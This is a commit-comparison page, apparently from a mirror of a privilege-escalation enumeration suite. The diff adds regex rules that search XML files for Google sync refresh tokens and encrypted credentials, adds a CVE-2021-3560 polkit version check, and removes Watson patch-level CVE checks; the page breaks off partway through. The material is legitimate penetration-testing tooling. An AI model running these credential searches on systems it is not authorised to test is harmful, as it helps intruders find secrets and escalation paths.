mirror of
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
synced 2026-01-06 14:49:07 +00:00
Compare commits
12 Commits
20241002-2
...
20241011-f
| Author | SHA1 | Date | |
|---|---|---|---|
|
85ab89511e | ||
|
|
623fdd24d7 | ||
|
|
26cb96cdc7 | ||
|
|
abd4aa59cd | ||
|
54fcb8a98b | ||
|
|
ac29863d3b | ||
|
|
c62c844683 | ||
|
|
d23be35a28 | ||
|
|
4b04fd143b | ||
|
|
08746a3dff | ||
|
|
eebe7974a9 | ||
|
|
4bd1dbdf45 |
@@ -1419,6 +1419,26 @@ search:
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "Google Cloud Directory Sync"
|
||||
value:
|
||||
files:
|
||||
- name: "*.xml"
|
||||
value:
|
||||
bad_regex: "oAuth2RefreshToken.*|authCredentialsEncrypted.*"
|
||||
type: d
|
||||
search_in:
|
||||
- common
|
||||
|
||||
- name: "Google Password Sync"
|
||||
value:
|
||||
files:
|
||||
- name: "*.xml"
|
||||
value:
|
||||
bad_regex: "baseDN.*|authorizeUsername.*"
|
||||
type: d
|
||||
search_in:
|
||||
- common
|
||||
|
||||
|
||||
- name: Road Recon
|
||||
value:
|
||||
|
||||
@@ -0,0 +1,21 @@
|
||||
# Title: System Information - CVE_2021_3560
|
||||
# ID: SY_CVE_2021_3560
|
||||
# Author: Carlos Polop
|
||||
# Last Update: 07-10-2024
|
||||
# Description: CVE-2021-3560 - paper box from HTB
|
||||
# License: GNU GPL
|
||||
# Version: 1.0
|
||||
# Functions Used:
|
||||
# Global Variables:
|
||||
# Initial Functions:
|
||||
# Generated Global Variables:
|
||||
# Fat linpeas: 0
|
||||
# Small linpeas: 0
|
||||
|
||||
if apt list --installed 2>/dev/null | grep -q 'polkit.*0\.105-26' || \
|
||||
yum list installed 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)' || \
|
||||
rpm -qa 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)'; then
|
||||
echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW},"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1,105 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_0836
|
||||
{
|
||||
private const string name = "CVE-2019-0836";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493475, 4498375, 4499154, 4505051, 4503291,
|
||||
4507458, 4512497, 4517276, 4522009, 4520011,
|
||||
4524153, 4525232, 4530681, 4534306, 4537776,
|
||||
4540693, 4550930, 4556826, 4561649, 4567518,
|
||||
4565513, 4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493470, 4499418, 4494440, 4534271, 4534307,
|
||||
4537764, 4537806, 4540670, 4541329, 4550929,
|
||||
4550947, 4556813, 4561616, 4567517, 4565511,
|
||||
4571694, 4577015
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 15063:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493474, 4493436, 4499162, 4499181, 4502112,
|
||||
4505055, 4503279, 4503289, 4509476, 4507450,
|
||||
4507467, 4512474, 4512507, 4516059, 4516068,
|
||||
4522011, 4520010, 4524151, 4525245, 4530711,
|
||||
4534296, 4537765, 4540705, 4550939, 4556804,
|
||||
4561605, 4567516, 4565499, 4571689, 4577021
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493441, 4493440, 4499147, 4499179, 4505062,
|
||||
4503281, 4503284, 4509477, 4507455, 4507465,
|
||||
4512494, 4512516, 4516066, 4522012, 4520004,
|
||||
4520006, 4524150, 4525241, 4530714, 4534276,
|
||||
4534318, 4537789, 4537816, 4540681, 4541330,
|
||||
4554342, 4550927, 4556812, 4561602, 4567515,
|
||||
4565508, 4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493464, 4493437, 4499167, 4499183, 4505064,
|
||||
4503286, 4503288, 4509478, 4507435, 4507466,
|
||||
4512501, 4512509, 4516045, 4516058, 4522014,
|
||||
4519978, 4520008, 4524149, 4525237, 4530717,
|
||||
4534293, 4534308, 4537762, 4537795, 4540689,
|
||||
4541333, 4554349, 4550922, 4550944, 4556807,
|
||||
4561621, 4567514, 4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493509, 4495667, 4494441, 4497934, 4501835,
|
||||
4505056, 4501371, 4503327, 4509479, 4505658,
|
||||
4507469, 4511553, 4512534, 4512578, 4522015,
|
||||
4519338, 4520062, 4524148, 4523205, 4530715,
|
||||
4534273, 4534321, 4532691, 4537818, 4538461,
|
||||
4541331, 4554354, 4549949, 4550969, 4551853,
|
||||
4561608, 4567513, 4558998, 4559003, 4565349,
|
||||
4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,82 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_0841
|
||||
{
|
||||
private const string name = "CVE-2019-0841";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 15063:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493474, 4493436, 4499162, 4499181, 4502112,
|
||||
4505055, 4503279, 4503289, 4509476, 4507450,
|
||||
4507467, 4512474, 4512507, 4516059, 4516068,
|
||||
4522011, 4520010, 4524151, 4525245, 4530711,
|
||||
4534296, 4537765, 4540705, 4550939, 4556804,
|
||||
4561605, 4567516, 4565499, 4571689, 4577021
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493441, 4493440, 4499147, 4499179, 4505062,
|
||||
4503281, 4503284, 4509477, 4507455, 4507465,
|
||||
4512494, 4512516, 4516066, 4522012, 4520004,
|
||||
4520006, 4524150, 4525241, 4530714, 4534276,
|
||||
4534318, 4537789, 4537816, 4540681, 4541330,
|
||||
4554342, 4550927, 4556812, 4561602, 4567515,
|
||||
4565508, 4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493464, 4493437, 4499167, 4499183, 4505064,
|
||||
4503286, 4503288, 4509478, 4507435, 4507466,
|
||||
4512501, 4512509, 4516045, 4516058, 4522014,
|
||||
4519978, 4520008, 4524149, 4525237, 4530717,
|
||||
4534293, 4534308, 4537762, 4537795, 4540689,
|
||||
4541333, 4554349, 4550922, 4550944, 4556807,
|
||||
4561621, 4567514, 4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4493509, 4495667, 4494441, 4497934, 4501835,
|
||||
4505056, 4501371, 4503327, 4509479, 4505658,
|
||||
4507469, 4511553, 4512534, 4512578, 4522015,
|
||||
4519338, 4520062, 4524148, 4523205, 4530715,
|
||||
4534273, 4534321, 4532691, 4537818, 4538461,
|
||||
4541331, 4554354, 4549949, 4550969, 4551853,
|
||||
4561608, 4567513, 4558998, 4559003, 4565349,
|
||||
4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,102 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1064
|
||||
{
|
||||
private const string name = "CVE-2019-1064";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4503267, 4503294, 4509475, 4507459, 4507460,
|
||||
4512495, 4512517, 4516044, 4516061, 4522010,
|
||||
4519998, 4524152, 4525236, 4530689
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 15063:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4503279, 4503289, 4509476, 4507450, 4507467,
|
||||
4512474, 4512507, 4516059, 4516068, 4522011,
|
||||
4520010, 4524151, 4525245, 4530711, 4534296,
|
||||
4537765, 4540705, 4550939, 4556804, 4561605,
|
||||
4567516, 4565499, 4571689, 4577021
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4503284, 4503281, 4509477, 4507455, 4507465,
|
||||
4512494, 4512516, 4516066, 4522012, 4520004,
|
||||
4520006, 4524150, 4525241, 4530714, 4534276,
|
||||
4534318, 4537789, 4537816, 4540681, 4541330,
|
||||
4554342, 4550927, 4556812, 4561602, 4567515,
|
||||
4565508, 4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4503286, 4503288, 4509478, 4507435, 4507466,
|
||||
4512501, 4512509, 4516045, 4516058, 4522014,
|
||||
4519978, 4520008, 4524149, 4525237, 4530717,
|
||||
4534293, 4534308, 4537762, 4537795, 4540689,
|
||||
4541333, 4554349, 4550922, 4550944, 4556807,
|
||||
4561621, 4567514, 4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4503327, 4501371, 4509479, 4505658, 4507469,
|
||||
4511553, 4512534, 4512578, 4522015, 4519338,
|
||||
4520062, 4524148, 4523205, 4530715, 4534273,
|
||||
4534321, 4532691, 4537818, 4538461, 4541331,
|
||||
4554354, 4549949, 4550969, 4551853, 4561608,
|
||||
4567513, 4558998, 4559003, 4565349, 4571748,
|
||||
4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4503293, 4501375, 4505903, 4507453, 4512508,
|
||||
4512941, 4515384, 4517211, 4522016, 4517389,
|
||||
4522355, 4524147, 4524570, 4530684, 4528760,
|
||||
4532695, 4532693, 4535996, 4540673, 4541335,
|
||||
4551762, 4554364, 4549951, 4550945, 4556799,
|
||||
4560960, 4567512, 4565483, 4559004, 4565351,
|
||||
4566116, 4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,109 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1130
|
||||
{
|
||||
private const string name = "CVE-2019-1130";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507458, 4512497, 4517276, 4522009, 4520011,
|
||||
4524153, 4525232, 4530681, 4534306, 4537776,
|
||||
4540693, 4550930, 4556826, 4561649, 4567518,
|
||||
4565513, 4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507460, 4507459, 4512495, 4512517, 4516044,
|
||||
4516061, 4522010, 4519998, 4524152, 4525236,
|
||||
4530689
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 15063:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507460, 4507459, 4512495, 4512517, 4516044,
|
||||
4516061, 4522010, 4519998, 4524152, 4525236,
|
||||
4530689
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507455, 4507465, 4512494, 4512516, 4516066,
|
||||
4522012, 4520004, 4520006, 4524150, 4525241,
|
||||
4530714, 4534276, 4534318, 4537789, 4537816,
|
||||
4540681, 4541330, 4554342, 4550927, 4556812,
|
||||
4561602, 4567515, 4565508, 4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507435, 4507466, 4512501, 4512509, 4516045,
|
||||
4516058, 4522014, 4519978, 4520008, 4524149,
|
||||
4525237, 4530717, 4534293, 4534308, 4537762,
|
||||
4537795, 4540689, 4541333, 4554349, 4550922,
|
||||
4550944, 4556807, 4561621, 4567514, 4565489,
|
||||
4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507469, 4505658, 4511553, 4512534, 4512578,
|
||||
4522015, 4519338, 4520062, 4524148, 4523205,
|
||||
4530715, 4534273, 4534321, 4532691, 4537818,
|
||||
4538461, 4541331, 4554354, 4549949, 4550969,
|
||||
4551853, 4561608, 4567513, 4558998, 4559003,
|
||||
4565349, 4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4507453, 4505903, 4512508, 4512941, 4515384,
|
||||
4517211, 4522016, 4517389, 4522355, 4524147,
|
||||
4524570, 4530684, 4528760, 4532695, 4532693,
|
||||
4535996, 4540673, 4541335, 4551762, 4554364,
|
||||
4549951, 4550945, 4556799, 4560960, 4567512,
|
||||
4565483, 4559004, 4565351, 4566116, 4574727,
|
||||
4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,86 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1253
|
||||
{
|
||||
private const string name = "CVE-2019-1253";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 15063:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4516068, 4516059, 4522011, 4520010, 4524151,
|
||||
4525245, 4530711, 4534296, 4537765, 4540705,
|
||||
4550939, 4556804, 4561605, 4567516, 4565499,
|
||||
4571689, 4577021
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4516066, 4522012, 4520004, 4520006, 4524150,
|
||||
4525241, 4530714, 4534276, 4534318, 4537789,
|
||||
4537816, 4540681, 4541330, 4554342, 4550927,
|
||||
4556812, 4561602, 4567515, 4565508, 4571741,
|
||||
4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4516058, 4516045, 4522014, 4519978, 4520008,
|
||||
4524149, 4525237, 4530717, 4534293, 4534308,
|
||||
4537762, 4537795, 4540689, 4541333, 4554349,
|
||||
4550922, 4550944, 4556807, 4561621, 4567514,
|
||||
4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4512578, 4522015, 4519338, 4520062, 4524148,
|
||||
4523205, 4530715, 4534273, 4534321, 4532691,
|
||||
4537818, 4538461, 4541331, 4554354, 4549949,
|
||||
4550969, 4551853, 4561608, 4567513, 4558998,
|
||||
4559003, 4565349, 4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4515384, 4517211, 4522016, 4517389, 4522355,
|
||||
4524147, 4524570, 4530684, 4528760, 4532695,
|
||||
4532693, 4535996, 4540673, 4541335, 4551762,
|
||||
4554364, 4549951, 4550945, 4556799, 4560960,
|
||||
4567512, 4565483, 4559004, 4565351, 4566116,
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,100 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1315
|
||||
{
|
||||
private const string name = "CVE-2019-1315";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4520011, 4525232, 4530681, 4534306, 4537776,
|
||||
4540693, 4550930, 4556826, 4561649, 4567518,
|
||||
4565513, 4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4519998, 4519979, 4525236, 4530689
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 15063:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4520010, 4525245, 4530711, 4534296, 4537765,
|
||||
4540705, 4550939, 4556804, 4561605, 4567516,
|
||||
4565499, 4571689, 4577021
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4520004, 4520006, 4525241, 4530714, 4534276,
|
||||
4534318, 4537789, 4537816, 4540681, 4541330,
|
||||
4554342, 4550927, 4556812, 4561602, 4567515,
|
||||
4565508, 4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4520008, 4519978, 4525237, 4530717, 4534293,
|
||||
4534308, 4537762, 4537795, 4540689, 4541333,
|
||||
4554349, 4550922, 4550944, 4556807, 4561621,
|
||||
4567514, 4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4519338, 4520062, 4523205, 4530715, 4534273,
|
||||
4534321, 4532691, 4537818, 4538461, 4541331,
|
||||
4554354, 4549949, 4550969, 4551853, 4561608,
|
||||
4567513, 4558998, 4559003, 4565349, 4571748,
|
||||
4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4517389, 4522355, 4524570, 4530684, 4528760,
|
||||
4532695, 4532693, 4535996, 4540673, 4541335,
|
||||
4551762, 4554364, 4549951, 4550945, 4556799,
|
||||
4560960, 4567512, 4565483, 4559004, 4565351,
|
||||
4566116, 4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,83 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1385
|
||||
{
|
||||
private const string name = "CVE-2019-1385";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525241, 4530714, 4534276, 4534318, 4537789,
|
||||
4537816, 4540681, 4541330, 4554342, 4550927,
|
||||
4556812, 4561602, 4567515, 4565508, 4571741,
|
||||
4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525237, 4530717, 4534293, 4534308, 4537762,
|
||||
4537795, 4540689, 4541333, 4554349, 4550922,
|
||||
4550944, 4556807, 4561621, 4567514, 4565489,
|
||||
4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4523205, 4530715, 4534273, 4534321, 4532691,
|
||||
4537818, 4538461, 4541331, 4554354, 4549949,
|
||||
4550969, 4551853, 4561608, 4567513, 4558998,
|
||||
4559003, 4565349, 4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4524570, 4530684, 4528760, 4532695, 4532693,
|
||||
4535996, 4540673, 4541335, 4551762, 4554364,
|
||||
4549951, 4550945, 4556799, 4560960, 4567512,
|
||||
4565483, 4559004, 4565351, 4566116, 4574727,
|
||||
4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18363:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4524570, 4530684, 4528760, 4532695, 4532693,
|
||||
4535996, 4540673, 4541335, 4551762, 4554364,
|
||||
4549951, 4550945, 4556799, 4560960, 4567512,
|
||||
4565483, 4559004, 4565351, 4566116, 4574727,
|
||||
4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,89 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1388
|
||||
{
|
||||
private const string name = "CVE-2019-1388";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525232, 4530681, 4534306, 4537776, 4540693,
|
||||
4550930, 4556826, 4561649, 4567518, 4565513,
|
||||
4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525236, 4530689
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525241, 4530714, 4534276, 4534318, 4537789,
|
||||
4537816, 4540681, 4541330, 4554342, 4550927,
|
||||
4556812, 4561602, 4567515, 4565508, 4571741,
|
||||
4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525237, 4530717, 4534293, 4534308, 4537762,
|
||||
4537795, 4540689, 4541333, 4554349, 4550922,
|
||||
4550944, 4556807, 4561621, 4567514, 4565489,
|
||||
4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4523205, 4530715, 4534273, 4534321, 4532691,
|
||||
4537818, 4538461, 4541331, 4554354, 4549949,
|
||||
4550969, 4551853, 4561608, 4567513, 4558998,
|
||||
4559003, 4565349, 4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4524570, 4530684, 4528760, 4532695, 4532693,
|
||||
4535996, 4540673, 4541335, 4551762, 4554364,
|
||||
4549951, 4550945, 4556799, 4560960, 4567512,
|
||||
4565483, 4559004, 4565351, 4566116, 4574727,
|
||||
4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,101 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2019_1405
|
||||
{
|
||||
private const string name = "CVE-2019-1405";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525232, 4530681, 4534306, 4537776, 4540693,
|
||||
4550930, 4556826, 4561649, 4567518, 4565513,
|
||||
4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525236, 4530689
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525241, 4530714, 4534276, 4534318, 4537789,
|
||||
4537816, 4540681, 4541330, 4554342, 4550927,
|
||||
4556812, 4561602, 4567515, 4565508, 4571741,
|
||||
4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4525237, 4530717, 4534293, 4534308, 4537762,
|
||||
4537795, 4540689, 4541333, 4554349, 4550922,
|
||||
4550944, 4556807, 4561621, 4567514, 4565489,
|
||||
4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4523205, 4530715, 4534273, 4534321, 4532691,
|
||||
4537818, 4538461, 4541331, 4554354, 4549949,
|
||||
4550969, 4551853, 4561608, 4567513, 4558998,
|
||||
4559003, 4565349, 4571748, 4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4524570, 4530684, 4528760, 4532695, 4532693,
|
||||
4535996, 4540673, 4541335, 4551762, 4554364,
|
||||
4549951, 4550945, 4556799, 4560960, 4567512,
|
||||
4565483, 4559004, 4565351, 4566116, 4574727,
|
||||
4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18363:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4524570, 4530684, 4528760, 4532695, 4532693,
|
||||
4535996, 4540673, 4541335, 4551762, 4554364,
|
||||
4549951, 4550945, 4556799, 4560960, 4567512,
|
||||
4565483, 4559004, 4565351, 4566116, 4574727,
|
||||
4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,98 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2020_0668
|
||||
{
|
||||
private const string name = "CVE-2020-0668";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537776, 4540693, 4550930, 4556826, 4561649,
|
||||
4567518, 4565513, 4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
